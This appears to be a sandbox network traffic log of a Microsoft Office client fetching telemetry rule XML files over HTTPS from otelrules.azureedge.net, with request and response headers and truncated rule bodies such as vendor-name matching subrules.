                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                      x-ms-request-id: 3111ff0c-301e-001f-4971-40aa3a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968vqt9xhC1EWRgten00000010fg00000000knub
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:31 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       94 | 192.168.2.4 | 49848 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:31 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:32 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 432
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                      x-ms-request-id: 9a67ffab-601e-00ab-7222-4166f4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221132Z-174f7845968n2hr8hC1EWR9cag0000001060000000008y4y
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:32 UTC | 432 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       95 | 192.168.2.4 | 49847 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:32 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:32 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                      x-ms-request-id: 77f1aa82-301e-003f-6391-3f266f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221132Z-174f7845968cpnpfhC1EWR3afc000000105000000000a3nz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:32 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       96 | 192.168.2.4 | 49849 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:33 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:34 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:33 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                      x-ms-request-id: 438404c1-e01e-0020-72a2-42de90000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221133Z-174f7845968cdxdrhC1EWRg0en00000010cg00000000mzvk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:34 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      97 | 192.168.2.4 | 49850 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:33 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                      x-ms-request-id: 4fa988ca-e01e-000c-2c91-3f8e36000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f78459685m244hC1EWRgp2c000000108g00000000mga9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      98 | 192.168.2.4 | 49851 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:33 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                      x-ms-request-id: 56901f94-d01e-002b-530d-4125fb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968pght8hC1EWRyvxg00000003t0000000000w2d
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      99 | 192.168.2.4 | 49852 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:34 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:34 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                      x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968kdththC1EWRzvxn0000000czg000000001q4n
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:34 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      100 | 192.168.2.4 | 49853 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:34 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:34 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                      x-ms-request-id: 5c7cfbca-b01e-0002-28f7-411b8f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221134Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gcha
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:35 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      101 | 192.168.2.4 | 49854 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:35 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 405
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                      x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968nxc96hC1EWRspw8000000109000000000a361
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:36 UTC | 405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      102 | 192.168.2.4 | 49855 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:35 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                      x-ms-request-id: 46d93ec3-201e-005d-5b34-41afb3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968j6t2phC1EWRcfe800000010k000000000phxr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:36 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                      103 | 192.168.2.4 | 49856 | 13.107.246.63 | 443
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:11:36 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:36 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 174
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                      x-ms-request-id: 41c1b425-301e-005d-48df-41e448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221136Z-174f7845968qj8jrhC1EWRh41s00000010d000000000gcnk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:36 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.4 | 49857 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:36 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:36 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:36 GMT
Content-Type: text/xml
Content-Length: 1952
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B956B0F3D"
x-ms-request-id: ba49513a-b01e-0098-68e4-41cead000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221136Z-174f7845968ljs8phC1EWRe6en00000010b000000000dv6w
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:36 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


Session ID | Source IP | Source Port | Destination IP | Destination Port
105 | 192.168.2.4 | 49858 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:36 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:37 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:37 GMT
Content-Type: text/xml
Content-Length: 958
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
ETag: "0x8DC582BA0A31B3B"
x-ms-request-id: 11676492-b01e-003d-10f9-41d32c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221137Z-174f7845968psccphC1EWRuz9s00000010pg00000000n7bm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:37 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


Session ID | Source IP | Source Port | Destination IP | Destination Port
106 | 192.168.2.4 | 49859 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:37 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:38 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:38 GMT
Content-Type: text/xml
Content-Length: 501
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
ETag: "0x8DC582BACFDAACD"
x-ms-request-id: 28a5aaf6-701e-000d-6b47-416de3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221138Z-174f78459685m244hC1EWRgp2c00000010fg000000000dnd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:38 UTC | 501 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.4 | 49860 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:38 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:38 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:38 GMT
Content-Type: text/xml
Content-Length: 2592
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5B890DB"
x-ms-request-id: e5837872-c01e-00a1-6f26-417e4a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221138Z-174f7845968frfdmhC1EWRxxbw00000010fg00000000medv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:38 UTC | 2592 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


Session ID | Source IP | Source Port | Destination IP | Destination Port
108 | 192.168.2.4 | 49861 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:38 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:38 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:38 GMT
Content-Type: text/xml
Content-Length: 3342
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
ETag: "0x8DC582B927E47E9"
x-ms-request-id: 13d8e9aa-301e-0020-7d2e-416299000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221138Z-174f7845968pght8hC1EWRyvxg00000003sg0000000028us
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:38 UTC | 3342 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.4 | 49862 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:38 UTC | 193 | OUT | GET /rules/rule224901v11s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:39 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:39 GMT
Content-Type: text/xml
Content-Length: 2284
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
ETag: "0x8DC582BCD58BEEE"
x-ms-request-id: fdaae0ed-201e-000c-15df-4179c4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221139Z-174f7845968zgtf6hC1EWRqd8s0000000tm00000000012q6
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:39 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


Session ID  Source IP    Source Port  Destination IP  Destination Port
110         192.168.2.4  49863        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-11-29 22:11:39 UTC  191                OUT        GET /rules/rule90401v3s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:39 UTC  515                IN         HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:39 GMT
Content-Type: text/xml
Content-Length: 1250
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE4487AA"
x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221139Z-174f7845968jrjrxhC1EWRmmrs00000010kg00000000hk39
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-29 22:11:39 UTC  1250               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
111         192.168.2.4  49864        13.107.246.63   443
Timestamp                Bytes transferred  Direction  Data
2024-11-29 22:11:40 UTC  192                OUT        GET /rules/rule701201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:40 UTC  494                IN         HTTP/1.1 200 OK
